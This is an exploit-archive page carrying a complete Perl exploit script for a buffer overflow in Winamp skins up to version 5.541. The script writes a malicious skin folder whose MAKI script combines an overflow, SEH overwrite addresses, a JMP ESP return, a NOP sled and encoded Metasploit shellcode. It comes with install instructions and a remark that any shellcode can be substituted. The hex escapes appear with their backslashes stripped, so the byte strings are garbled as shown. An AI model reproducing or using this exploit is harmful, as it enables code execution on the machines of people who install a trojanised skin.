[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Winamp <= 5.541 Skin Universal Buffer Overflow Exploit
# Published : 2009-03-05
# Author : SkD
# Previous Title : MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Next Title : Media Commands .m3l File Local Buffer Overflow Exploit
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:Program FilesWinAmpSkins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
my $skin_xml = "xEFxBBxBFx3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3D".
"x22x55x54x46x2Dx38x22x20x73x74x61x6Ex64x61x6Cx6Fx6Ex65x3Dx22x79x65x73x22x3Fx3Ex0Dx0Ax0Dx0Ax3Cx57".
"x69x6Ex61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x20x76x65x72x73x69x6Fx6Ex3Dx22x31".
"x2Ex33x34x22x3Ex0Dx0Ax09x3Cx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax09x09x3Cx76x65x72x73x69x6Fx6Ex3Ex31".
"x2Ex32x3Cx2Fx76x65x72x73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx6Ex61x6Dx65x3Ex42x65x6Ex74x6Fx3Cx2Fx6Ex61x6D".
"x65x3Ex0Dx0Ax09x09x3Cx61x75x74x68x6Fx72x3Ex53x6Bx44x3Cx2Fx61x75x74x68x6Fx72x3Ex0Dx0Ax09x09x3Cx63".
"x6Fx6Dx6Dx65x6Ex74x3Ex53x6Bx44x3Cx2Fx63x6Fx6Dx6Dx65x6Ex74x3Ex0Dx0Ax09x09x3Cx65x6Dx61x69x6Cx3Ex73".
"x6Bx64x72x61x74x40x68x6Fx74x6Dx61x69x6Cx2Ex63x6Fx6Dx3Cx2Fx65x6Dx61x69x6Cx3Ex0Dx0Ax09x09x3Cx73x63".
"x72x65x65x6Ex73x68x6Fx74x3Ex53x6Bx44x73x68x6Fx74x2Ex70x6Ex67x3Cx2Fx73x63x72x65x65x6Ex73x68x6Fx74".
"x3Ex0Dx0Ax09x09x3Cx68x6Fx6Dx65x70x61x67x65x3Ex68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex53x6Bx44x2Ex63x6F".
"x6Dx2Fx3Cx2Fx68x6Fx6Dx65x70x61x67x65x3Ex0Dx0Ax09x3Cx2Fx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax0Dx0Ax09".
"x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x67x65x6Ex65x72x61x6Cx22x3E".
"x0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx46x22x20x61x63".
"x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx46x49x4Cx45x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63".
"x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx50x22x20x61x63x74x69x6Fx6Ex3Dx22x4D".
"x45x4Ex55x48x4Fx54x4Bx45x59x5Fx50x4Cx41x59x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74".
"x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx4Fx22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4B".
"x45x59x5Fx4Fx50x54x49x4Fx4Ex53x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62".
"x69x6Ex64x3Dx22x41x6Cx74x2Bx49x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx56".
"x49x45x57x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6C".
"x74x2Bx48x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx48x45x4Cx50x22x20x2Fx3E".
"x0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x6Ex6Fx72x6Dx61x6Cx22x3Ex0Dx0Ax09x09x09x3Cx61x63x63x65".
"x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x73x70x61x63x65x22x20x61x63x74x69x6Fx6Ex3Dx22x53x48x4F".
"x57x5Fx43x55x52x52x45x4Ex54x5Fx54x52x41x43x4Bx22x20x2Fx3Ex0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx21x2Dx2Dx20x54x68x69x73x20x53x6Bx69x6Ex20x75x73x65x73x20x73x68".
"x61x72x65x64x20x47x72x61x70x68x69x63x73x2Cx20x58x4Dx4Cx20x61x6Ex64x20x4Dx61x6Bx69x20x66x72x6Fx6D".
"x20x27x42x69x67x20x42x65x6Ex74x6Fx27x20x2Dx2Dx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3Ex0Dx0A".
"x09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3Dx22x73".
"x6Dx61x6Cx6Cx22x2Fx3Ex20x3Cx21x2Dx2Dx20x4Dx75x73x74x20x62x65x20x6Cx6Fx61x64x65x64x20x61x74x20x66".
"x69x72x73x74x20x2Dx2Dx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax09x3Cx69x6Ex63x6Cx75".
"x64x65x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x2Fx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3E".
"x0Dx0Ax09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3D".
"x22x31x33x30x2Cx31x38x22x2Fx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax3Cx2Fx57x69x6E".
"x61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x3E";
my $maki_script1 = "x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0Dx51x4Ax91xE3xA6xB5x32x35xF3xE7x64x0FxF5xD6".
"xFAx93xB7x49x93xF1xBAx66xEFxAEx3Ex98x7BxC4x0DxE9x0Dx84xE7x4AxB0x2Cx04x0BxD2x75xF7xFCxB5x3Ax02xB2".
"x4Dx43xA1x4BxBExAEx59x63x75x03xF3xC6x78x57xC6x87x43xE7xFEx49x85xF9x09xCCx53x2AxFDx56x65x36x60x38".
"x1Bx46xA7x42xAAx75xD8x3Fx66x67xBFx73xF4x7Ax78xF4xBBxB2xF7x4Ex9CxFBxE7x4BxA9xBExA8x8Dx02x0Cx37x3A".
"xBFx3Cx9Fx43x84xF1x86x88x5BxCFx1Ex36xB6x5Bx0Cx5DxE1x7Dx1Fx4BxA7x0Fx8Dx16x59x94x19x41x99xE1xE3x4E".
"x36xC6xECx4Bx97xCDx78xBCx9Cx86x28xB0xE5x95xBEx45x72x20x91x41x93x5CxBBx5FxF9xF1x17xFDx4Ex6Dx90x60".
"x7Ex53x2Ex48xB0x04xCCx94x61x88x56x72xC0xBCx3Ax40x22x6FxD6x4Bx8BxA4x10xC8x29x93x25x47x4Dx3ExAAx97".
"xD0xF4xA8x4Fx81x7Bx0AxF2x2Ax45x49x83xFAxBBxE4x64xF4x81xD9x49xB0xC0xA8x5Bx2ExC3xBCxFDx3Fx5ExB6x62".
"x5Ex37x8Dx40x8DxEAx76x81x4AxB9x1Bx77xBEx97x4FxCExB0x77x19x4Ex99x56xD4x98x33xC9x6Cx27x0Dx20xC2xA8".
"xEBx51x2Ax4BxBAx7Fx5Dx4BxC6x5Dx4Cx71x38xBAx1Ex8Dx9Ex48x3Ex48xB9x60x8Dx1Fx43xC5xC4x05x40xC9x08x0F".
"x39xAFx23x4Bx80xF3xB8xC4x8Fx7ExBBx59x72x86xAAxEFx0Ex31xFAx41xB7xDCx85xA9x52x5BxCBx4Bx44x32xFDx7D".
"x51x37x7Cx4ExBFx40x82xAEx5Fx3AxDCx33x15xFAxB9x5Ax7Dx9Ax57x45xABxC8x65x57xA6xC6x7CxA9xCDxDDx8Ex69".
"x1Ex8FxECx4Fx9Bx12xF9x44xF9x09xFFx45x27xCDx64x6Bx26x5Ax4Bx4Cx8Cx59xE6xA7x0CxF6x49x3AxE4x05xCBx6D".
"xC4x8AxC2x48xB1x93x49xF0x91x0ExF5x4AxFFxCFxDCxB4xFEx81xCCx4Bx96x1Bx72x0FxD5xBEx0FxFFxE1x8CxE2x01".
"x59xB0xD5x11x97x9FxE4xDEx6Fx51x76x0AxBDxF8xF0x80xA5x1BxA6x42xA0x93x32x36xA0x0Cx8Dx4Ax1Bx34x2Ex9B".
"x98x6CxFAx40x8Bx85x0Cx1Bx6ExE8x94x05x71x9BxD5x36xFDx03xF8x4Ax97x95x05x02xB7xDBx26x7Ax10xF2xD5x7F".
"xC4xACxDFx48xA6xA0x54x51x57x6CxDCx76x35xA5xBAxB5xB3x05xCBx4DxADxC1xE6x18xD2x8Fx68x96xC1xFEx29x61".
"xB7xDAx51x4Dx91x65x01xCAx0Cx1Bx70xDBxF7x14x95xD5x36xEDxE8x45x98x0Fx3Fx4ExA0x52x2CxD9x82x4Bx3Bx9B".
"x7Ax66x0Ex42x8FxFCx79x41x15x80x9Cx02x99x31xEDxC7x19x53x98x47x98x63x60xB1x5Ax29x8CxAAx4DxC1xBBxE2".
"xF6x84x73x41xBDxB3xB2xEBx2Fx66x55x50x94x05xC0x73x1Fx96x1Bx40x9Bx1Bx67x24x27xACx41x65x12x00x00x00".
"x01x01x00x00x11x00x67x65x74x52x75x6Ex74x69x6Dx65x56x65x72x73x69x6Fx6E";
my $maki_script2 = "x01x01x00x00x0Bx00x67x65x74x53x6Bx69x6Ex4Ex61x6Dx65x01x01x00x00x0Dx00x67x65x74x50x72x69x76x61x74".
"x65x49x6Ex74x01x01x00x00x0Cx00x67x65x74x54x69x6Dx65x4Fx66x44x61x79x01x01x00x00x0Dx00x73x65x74x50".
"x72x69x76x61x74x65x49x6Ex74x01x01x00x00x0Ax00x6Dx65x73x73x61x67x65x42x6Fx78x01x01x00x00x0Fx00x69".
"x6Ex74x65x67x65x72x54x6Fx53x74x72x69x6Ex67x01x01x00x00x0Ex00x6Fx6Ex53x63x72x69x70x74x4Cx6Fx61x64".
"x65x64x01x01x00x00x0Ex00x67x65x74x53x63x72x69x70x74x47x72x6Fx75x70x0Ax01x00x00x09x00x67x65x74x4F".
"x62x6Ax65x63x74x01x01x00x00x0Dx00x6Fx6Ex53x65x74x58x75x69x50x61x72x61x6Dx01x01x00x00x08x00x73x74".
"x72x6Cx6Fx77x65x72x01x01x00x00x0Fx00x73x74x72x69x6Ex67x54x6Fx49x6Ex74x65x67x65x72x14x01x00x00x07".
"x00x73x65x74x54x65x78x74x16x01x00x00x0Bx00x73x65x74x58x6Dx6Cx70x61x72x61x6Dx14x01x00x00x0Dx00x6F".
"x6Ex54x65x78x74x43x68x61x6Ex67x65x64x14x01x00x00x0Cx00x67x65x74x41x75x74x6Fx57x69x64x74x68x14x01".
"x00x00x0Bx00x73x65x74x58x6Dx6Cx50x61x72x61x6Dx23x00x00x00x01x01x00x00x00x00x00x00x00x00x00x00x01".
"x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00x02x00x00x00xFFxFFx00".
"x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x14x01x00".
"x00x00x00x00x00x00x00x00x00x01x00x14x01x00x00x00x00x00x00x00x00x00x00x01x00x16x01x00x00x00x00x00".
"x00x00x00x00x00x01x00x0Ax01x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00".
"x00x01x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x0Dx00x00".
"x00x07x00x00x00x0Cx00x72x75x6Ex74x69x6Dx65x63x68x65x63x6Bx0Cx00x00x00x15x00x54x68x69x73x20x73x63".
"x72x69x70x74x20x72x65x71x75x69x72x65x73x20x0Dx00x00x00x1Fx00x57x69x6Ex61x6Dx70x20x35x2Ex35x34x20".
"x28x73x6Bx69x6Ex20x76x65x72x73x69x6Fx6Ex20x31x2Ex33x34x29x0Ex00x00x00x05x00x45x72x72x6Fx72x0Fx00".
"x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x18x00x00x00x04x00x74x65x78x74x19x00x00x00x05x00x6C".
"x61x62x65x6Cx1Ax00x00x00x04x00x6Cx69x6Ex6Bx1Dx00x00x00x05x00x73x68x69x66x74x1Ex00x00x00x07x00x74".
"x6Fx6Fx6Cx74x69x70x21x00x00x00x01x00x78x22x00x00x00x01x00x77x03x00x00x00x00x00x00x00x07x00x00x00".
"x5Fx01x00x00x00x00x00x00x0Ax00x00x00xCCx01x00x00x14x00x00x00x0Fx00x00x00x7Bx02x00x00x1Bx03x00x00".
"x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00x30x02x01x03x00x00x00x01x04x00x00x00x0Cx01x03x00x00".
"x00x01x05x00x00x00x0Ax51x10xB9x00x00x00x01x02x00x00x00x01x06x00x00x00x30x02x01x09x00x00x00x01x00".
"x00x00x00x01x08x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01x0A".
"x00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0Ax00x00x00x01x09x00x00x00x41x01x0Bx00x00x00x0C".
"x01x09x00x00x00x01x0Ax00x00x00x0Cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00x00x01x00x00x00".
"x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00".
"x01x0Fx00x00x00x01x06x00x00x00x01x0Ex00x00x00x01x0Cx00x00x00x01x0Dx00x00x00x40x18x05x00x00x00x02".
"x01x08x00x00x00x21x01x06x00x00x00x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0Fx00x00".
"x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00x00x00x04x02x01x01x00x00x00x21x03x12x00".
"x00x00x01x00x00x00x00x01x0Fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00x01x12x00x00x00".
"x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01x00x00x00x21x01x17x00x00x00x01x08x00x00x00x30x02x19".
"x9CxFExFFxFFx11x06x00x00x00x01x01x00x00x00x21x01x16x00x00x00x01x00x00x00x00x70x08x00x00x00x00x30".
"x02x01x13x00x00x00x01x16x00x00x00x01x18x00x00x00x70x09x00x00x00x01x30x02x01x14x00x00x00x01x16x00".
"x00x00x01x19x00x00x00x70x09x00x00x00x01x30x02x01x15x00x00x00x01x16x00x00x00x01x1Ax00x00x00x70x09".
"x00x00x00x01x30x02x01x01x00x00x00x21x03x1Bx00x00x00x03x1Cx00x00x00x01x02x00x00x00x10x06x00x00x00".
"x01x01x00x00x00x21x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Dx00x00x00x08x10x17x00x00".
"x00x01x17x00x00x00x01x00x00x00x00x01x1Cx00x00x00x70x0Cx00x00x00x01x30x02x01x00x00x00x00x01x1Bx00".
"x00x00x70x0Bx00x00x00x01x01x19x00x00x00x08x10x11x00x00x00x01x14x00x00x00x01x1Cx00x00x00x70x0Dx00".
"x00x00x01x02x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Ax00x00x00x08x10x16x00x00x00x01".
"x15x00x00x00x01x1Cx00x00x00x01x1Ex00x00x00x70x0Ex00x00x00x02x02x01x01x00x00x00x21x03x1Fx00x00x00".
"x01x02x00x00x00x10x06x00x00x00x01x01x00x00x00x21x01x20x00x00x00x01x14x00x00x00x70x10x00x00x00x00".
"x01x17x00x00x00x40x30x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x70x06x00x00x00x01x01x21x00".
"x00x00x70x11x00x00x00x02x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x4Cx70x06x00x00x00x01x01".
"x22x00x00x00x70x11x00x00x00x02x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02".
"x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d".
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c".
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45".
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36".
"x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e".
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a".
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d".
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74".
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57".
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38".
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b".
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77".
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b".
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53".
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f".
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31".
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50".
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37".
"x70x41";
my $overflow1 = "x41" x 314;
my $overflow2 = "x41" x 128;
my $overflow3 = "x90" x 8;
my $sehjmp = "xebx12x41x41";
my $sehret = "x11x10xf0x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "xf8x99x01x12"; #0x120199F8 JMP ESP
my $nopsled = "x90" x 12;
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploitn";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)n";
print "[x] Creating skin dirn";
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml filen";
open(my $skin_xml_file, ">SkD's Skin\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI scriptn";
open(my $maki_script_file, ">SkD's Skin\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!n";
# www.Syue.com [2009-03-05]